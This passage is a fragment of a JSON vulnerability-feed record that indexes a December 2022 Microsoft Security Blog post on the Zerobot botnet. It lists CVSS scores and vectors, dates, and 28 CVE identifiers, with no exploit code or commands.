Avnery**, Microsoft Defender Research Team \n**Ramin Nafisi**, **Ross Bevington**, Microsoft Threat Intelligence Center (MSTIC)_\n\nThe post [Microsoft research uncovers new Zerobot capabilities](<https://www.microsoft.com/en-us/security/blog/2022/12/21/microsoft-research-uncovers-new-zerobot-capabilities/>) appeared first on [Microsoft Security Blog](<https://www.microsoft.com/en-us/security/blog>).", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": 
"HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 9.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2022-12-21T20:00:00", "type": "mmpc", "title": "Microsoft research uncovers new Zerobot capabilities", "bulletinFamily": "blog", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 10.0, "vectorString": "AV:N/AC:L/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "obtainUserPrivilege": false}, "cvelist": ["CVE-2014-8361", "CVE-2016-20017", "CVE-2017-17105", "CVE-2017-17106", "CVE-2017-17215", "CVE-2018-10561", "CVE-2018-12613", "CVE-2018-20057", "CVE-2019-10655", "CVE-2020-10987", "CVE-2020-25223", "CVE-2020-25506", "CVE-2020-7209", "CVE-2021-35395", "CVE-2021-36260", "CVE-2021-42013", "CVE-2021-46422", "CVE-2022-22965", "CVE-2022-25075", "CVE-2022-26186", "CVE-2022-26210", "CVE-2022-30023", "CVE-2022-30525", "CVE-2022-31137", "CVE-2022-33891", "CVE-2022-34538", "CVE-2022-37061", "CVE-2022-42013"], "modified": "2022-12-21T20:00:00", "id": "MMPC:0FBB61490D4A94C83AEE14DDEE722297", "href": "https://www.microsoft.com/en-us/security/blog/2022/12/21/microsoft-research-uncovers-new-zerobot-capabilities/", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}]}